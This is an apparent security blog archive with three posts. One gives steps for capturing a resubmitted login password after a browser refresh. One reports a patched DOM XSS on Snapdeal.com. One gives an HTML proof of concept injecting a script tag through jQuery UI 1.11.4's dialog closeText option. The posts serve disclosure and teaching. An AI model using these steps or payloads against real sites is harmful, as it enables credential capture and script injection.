Posts

Showing posts from May, 2016

Browser refresh attack

Image
Browser refresh attack is attack which enables an adversary to obtain application credentials by going by to previous page and re-submitting the expired-document. How to perform: Log into to https://<some-site>/login Once logged in, try for change password and logout. Press "Back" on the browser window. Now you'll see the "Document Expired" page. Now run an interceptor (burp/tamper data) Click "Try again" on the web page Click "Re-send data" Watch the intercepted request. You'll observe that login passwords being resubmitted by browser get captured.
Post a Comment
Read more

Snapdeal.com - Cross Site Scripting #Bug (DOM Based)

Image
It was shocking to get a XSS vulnerability in Snapdeal.com. Recently, I was using snapdeal for purchasing for some goods but when i tried my luck for XSS, it was hardly a matter of seconds. Basically it was DOM based XSS. The requested payload was not going to server. Instead it was being include in DOM itself and executes on browser. Proof of Concept: I used this URL with bcrumbSearch parameter which was used for searching the product name from DOM. As you try to use this URL, script get executes on browser and I got a million dollar smile. Aftermath : As a responsible security researcher, I reported this issue to help@snapdeal.com and support@snapdeal.com. I didn't got any reply from their side yet but meanwhile issue got patched without any intimation.
Post a Comment
Read more

JQuery UI 1.11.4 Cross Site Scripting

Vulnerability name: XSS Reflected JQuery UI 1.11.4  I think nearly everyone gets shocked, when your Acunetix shows Cross Site Scripting in Jquery UI. But, may be many of you don’t know how to exploit it. So, here is a Code which will explain how to exploit vulnerabilities like these. Place the script on dialog function as shown in the Code below. <!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml"> <head>     <title>XSS in closeText option of component ui dialog</title>     <script src="https://code.jquery.com/jquery-2.1.4.js"></script>     <script src="https://code.jquery.com/ui/1.11.4/jquery-ui.js"></script>       <script>         $(document).ready(function () {             $('#dialog').dialog({ closeText: ' <script>alert("XSS")<\/script> ' });         });     </script> </head> <body>   
4 comments
Read more